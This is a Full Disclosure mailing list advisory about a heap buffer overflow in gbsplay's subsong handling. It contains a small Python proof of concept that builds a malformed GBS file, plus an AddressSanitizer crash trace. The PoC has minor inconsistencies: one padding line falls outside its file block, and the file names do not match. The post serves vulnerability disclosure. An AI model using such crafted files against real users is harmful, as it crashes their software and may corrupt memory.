Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

gbsplay 0.0.100-18 Heap Buffer Overflow in update_status_on_subsong_change in gbsplay

From: Ron E <ronaldjedgerson () gmail com>
Date: Sat, 13 Sep 2025 09:41:12 -0400
A heap buffer overflow vulnerability exists in gbsplay 0.0.100-18-g50352f3
(latest development snapshot at the time of testing). When opening a
crafted GBS file with inconsistent subsong metadata, the function
update_status_on_subsong_change (gbs.c:501) reads past the bounds of a
heap-allocated structure. The bug is triggered during subsong status update
when the reported total_songs or subsong indices are malformed.
AddressSanitizer (ASan) reports an out-of-bounds read of size 8 just before
the allocated region.

An attacker can exploit this vulnerability by tricking a victim into
playing a malicious .gbs file. Depending on the environment, this may
result in Denial of Service (DoS) (application crash) or potentially
arbitrary code execution due to memory corruption.

*Impact*


   - Immediate crash on crafted file.
   - Attackers may influence heap layout and overflow conditions.

*Proof of Concept*

Create a minimal, malformed GBS file:


import struct, os

with open("crash.gbs", "wb") as f:
    f.write(b"GBS" + bytes([1]))  # Magic + version
    f.write(bytes([1]))           # total_songs = 1
    f.write(bytes([1]))           # starting_song = 1
    f.write(struct.pack("<HHHH", 0x4000, 0x4010, 0x4020, 0xFFFE))
    f.write(bytes([0, 0]))
    f.write(b"PoC".ljust(32, b"\x00")*3)
f.write(b"\x00"*0x1000)       # pad

ASAN_OPTIONS=abort_on_error=1,detect_leaks=0 \

UBSAN_OPTIONS=print_stacktrace=1 \

./gbsplay -o stdout seeds/minimal.gbs

*Observe crash:*

=================================================================

==690137==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x502000001308 at pc 0xaaaad32b29c4 bp 0xffffe6778f90 sp 0xffffe6778f88

READ of size 8 at 0x502000001308 thread T0

    #0 0xaaaad32b29c0 in update_status_on_subsong_change
/root/gbsplay/gbs.c:501:54

    #1 0xaaaad32b21f8 in gbs_configure /root/gbsplay/gbs.c:131:2

    #2 0xaaaad32a5584 in common_init /root/gbsplay/player.c:610:2

    #3 0xaaaad329e220 in main /root/gbsplay/gbsplay.c:226:8

    #4 0xffffaac62290 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16

    #5 0xffffaac62374 in __libc_start_main csu/../csu/libc-start.c:360:3

    #6 0xaaaad31bedec in _start (/root/gbsplay/gbsplay+0x3edec) (BuildId:
c8259c242d7a0acbf2dd69253dd04032772c13a3)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: